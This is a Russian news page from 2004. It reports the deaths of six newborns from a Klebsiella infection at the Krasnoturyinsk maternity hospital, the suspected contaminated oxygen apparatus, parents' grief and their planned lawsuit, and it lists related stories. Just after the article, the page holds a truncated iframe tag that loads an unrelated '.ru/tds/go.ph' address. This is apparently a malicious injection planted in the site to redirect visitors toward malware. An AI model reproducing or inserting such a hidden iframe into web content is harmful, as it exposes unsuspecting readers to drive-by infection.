15.01.2004, 09:41

«КоммерсантЪ-Урал», Мария Черкасова, Наталья Калинина говорят, что «Родители прокляли роддом в Краснотурьинске»

Вчера стали известны версии причин трагедии, разразившейся в родильном муниципальном доме города Краснотурьинска (Свердловская область) в Новый год. Как заявил заместитель главного санитарного врача области Виктор Романенко, по предварительным данным погибшие младенцы были заражены гнойно-септической инфекцией через кислородный аппарат. В свою очередь родители погибших детей намерены привлечь врачей больницы к ответственности и сейчас готовятся к подаче коллективного иска в суд.
ЧП в Краснотурьинске произошло в конце декабря. За 2 недели из-за вспышки гнойно-септической инфекции было инфицировано 13 новорожденных, погибло 6 младенцев. 2 сейчас находятся в реанимации детской больницы. В данный момент роддом закрыт, всех рожениц отправляют в ближайший роддом города Карпинска. Прокуратура города уже возбудила по факту трагедии уголовное дело по статье 109 УК РФ («Причинение смерти по неосторожности двум и более лицам»).
Как заявил корреспонденту «Ъ» главный врач роддома Марат Салахов, наиболее вероятной причиной гибели детей является внутриутробная инфекция, а также то, что трое детей «родились глубоко недоношенными». Однако поступившие вчера первые результаты расследования произошедшего говорят о несоблюдении санитарных норм со стороны самого медперсонала. В частности, как сообщили «Ъ» в пресс-службе Минздрава области, выяснилось, что возбудитель инфекции вирус — Klebsiella pneumonia был обнаружен на оборудовании, которым оснащено медицинское учреждение. В свою очередь заместитель главного санитарного врача области Виктор Романенко заявил, что, вероятнее всего, в организм погибших детей вирус попал через нестерильный кислородный аппарат, к которому подключали всех новорожденных. По неподтвержденной информации, последняя дезинфекция аппарата была в октябре прошлого года.
Корреспонденту «Ъ» удалось пообщаться с родителями погибших детей. Практически все родственники говорят, что дети рождались здоровыми. А спустя время их состояние начинало резко ухудшаться, детей переводили в реанимацию.
— У меня было впечатление, что дети мутируют на глазах, —рассказала корреспонденту «Ъ» мать погибшей девочки Маши Юля Гостева. — На лице у нее появилась какая-то огромная шишка.
О подобных симптомах у сына говорит и мама погибшего Матвея Марина Хромых:
— У моего сына так раздуло животик, что невозможно было застегнуть памперс... Совершенно очевидно, что с нашими малышами происходило что-то ненормальное.
Фактически все родители, уже не доверяя компетентности врачей, пытались перевезти своих детей в Екатеринбург. Как рассказал супруг госпожи Гостевой Алексей, он даже «выбил» для этого вертолет, но ребенка врачи роддома родителям не отдали.
— При этом нам никто внятно не мог объяснить, что происходит с нашими малышами. Вместо этого их накачивали антибиотиками. Моего ребенка обкололи так, что лопалась кожа на ножках — столько жидкости было в его тельце. Это ужас. Злейшему врагу не пожелаешь такого. Я проклинаю ту минуту, когда я решилась ехать в Краснотурьинск, я проклинаю этот город — здесь у меня отняли самое дорогое, — рассказала Марина Хромых.
Сейчас потерявшие детей родители обсуждают возможность направить коллективное исковое заявление в суд. При этом они пока не пришли к единому мнению о своих требованиях.
— Речь не идет о денежном возмещении. Мы просто хотим, чтобы врачи, погубившие детей, были наказаны, — подчеркнул Алексей Гостевой.
«Ъ» будет следить за развитием событий.
<iframe src="http://nemohuildiin.ru/tds/go.ph

Похожие новости по теме
22.01.2004, 09:50

Новорожденных Краснотурьинска убила нехватка специалистов

Вчера депутаты областной Думы заслушали отчет областного министра здравоохранения Михаила Скляра о ситуации в родильном доме Краснотурьинска. Как заявил Михаил Скляр, первые случаи заболевания...

16.01.2004, 09:41

«Подробности»: «Дело роддома» дошло до Москвы

Гибелью младенцев в роддоме Краснотурьинска заинтересовались федеральные власти. Расследование взяла под свой контроль вице-премьер Правительства России Галина Карелова. Родильный дом Краснотурьинска...

15.01.2004, 09:45

«Подробности»: Заразный роддом с европейским дипломом»

За две недели в роддоме Краснотурьинска от сепсиса погибли шесть младенцев. Европейский аттестат «Больница, доброжелательная к ребенку» не спас недоношенных детей — их сгубили антисанитарные условия....

15.01.2004, 09:47

«Уральский рабочий» и Михаил Смышляев сообщают, что «Остались мамы без детей»

Краснотурьинск. Шокирующее известие о чрезвычайном происшествии в родильном доме пришло из этого северного города: с 28 декабря 2003 года по 12 января 2004 года здесь умерло шесть новорожденных....

14.01.2004, 14:29

Начались поиски виновных в гибели 6 новорожденных

Становятся известными первые подробности расследования по факту гибели 6 и заражения ещё 13 новорожденных младенцев в роддоме города Краснотурьинска. Как и предсказывало ИА «Политсовет», прокуратура...


Мастрид
Погода на неделю
Популярные новости
Новости по дням
Новости по месяцам